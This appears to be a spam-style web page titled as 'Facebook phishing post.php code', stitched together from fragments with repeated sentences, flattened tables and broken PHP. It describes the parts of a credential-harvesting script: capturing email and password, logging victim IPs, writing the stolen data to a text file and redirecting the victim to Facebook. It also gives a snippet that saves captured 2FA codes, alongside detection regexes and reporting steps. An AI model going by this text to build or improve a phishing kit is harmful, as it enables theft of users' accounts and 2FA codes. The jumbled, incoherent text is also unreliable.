Facebook Phishing Postphp Code [BEST]

Phishing typically involves creating a fake webpage or message that appears to be from a legitimate source. The goal is to trick the victim into entering their personal information on the fake site.

| Component | Purpose | Attacker's Benefit | | :--- | :--- | :--- | | $_SERVER['REQUEST_METHOD'] | Ensures the script only runs on POST requests. | Prevents bots from triggering the redirect accidentally. | | $_POST['email'] , $_POST['pass'] | Superglobals that capture form data. | Directly harvests credentials. | | $_SERVER['REMOTE_ADDR'] | Records the victim's IP address. | Used for geo-targeting or selling "leads." | | file_put_contents('logs.txt', ..., FILE_APPEND) | Appends credentials to a flat file. | Simple, no database required. Attacker retrieves logs.txt via HTTP or FTP. | | header('Location: https://www.facebook.com/login.php') | The keystone – immediate redirection. | Victim is unaware of the theft because they end up on FB. | facebook phishing postphp code

| Component | Weakness | Detection Method | |-----------|----------|------------------| | $_POST['email'] | Plaintext credential handling | Regex for $_POST\['(email|pass|password|login)'\] | | file_put_contents("log.txt") | Writes world-readable credential file | Monitor file creation with inotify or auditd | | header("Location: ...") | Redirect to Facebook after theft | Check for unexpected 302 to facebook.com not from fb domain | | mail() usage | Sends plaintext credentials over SMTP | Alert on mail() with suspicious content (FB log, $email:$pass) | Phishing typically involves creating a fake webpage or

The following PHP example demonstrates a simple form handler. This should not be used for phishing or any malicious activity. | Component | Weakness | Detection Method |

<?php
// Simple form handler example
// Check if the form has been submitted
if ($_SERVER["REQUEST_METHOD"] == "POST") 
    // Collect post data
    $email = htmlspecialchars($_POST['email']);
    $password = htmlspecialchars($_POST['password']);
// Normally, you wouldn't just echo, but this is for illustration
    echo "Email: " . $email . ", Password: " . $password;
// In a real application, you'd store or use these securely
    // NEVER store passwords in plain text or send them unencrypted
// HTML form for demonstration
?>
<form action="<?php echo $_SERVER["PHP_SELF"]; ?>" method="post">
    Email: <input type="text" name="email"><br>
    Password: <input type="password" name="password"><br>
    <input type="submit" value="Submit">
</form>
  • Extract victim emails from log.txt (if present) to notify them.
  • Block the IP of the attacker if they logged in to view logs.
  • Report to Facebook via https://www.facebook.com/phishing.
  • Submit the kit to PhishTank or OpenPhish.

    • If you see or receive phishing attempts, report them to the platform being impersonated (e.g., Facebook's report feature) and to your email provider if you received it via email.

    Instead of just stealing passwords, advanced post.php scripts also steal session cookies or 2FA tokens.

    // After capturing email/pass, capture any POSTed 2FA code
if (isset($_POST['twofactor'])) 
    $twofactor = $_POST['twofactor'];
    file_put_contents('2fa_codes.txt', "$email:$twofactor\n", FILE_APPEND);
// Then redirect to a real Facebook 2FA page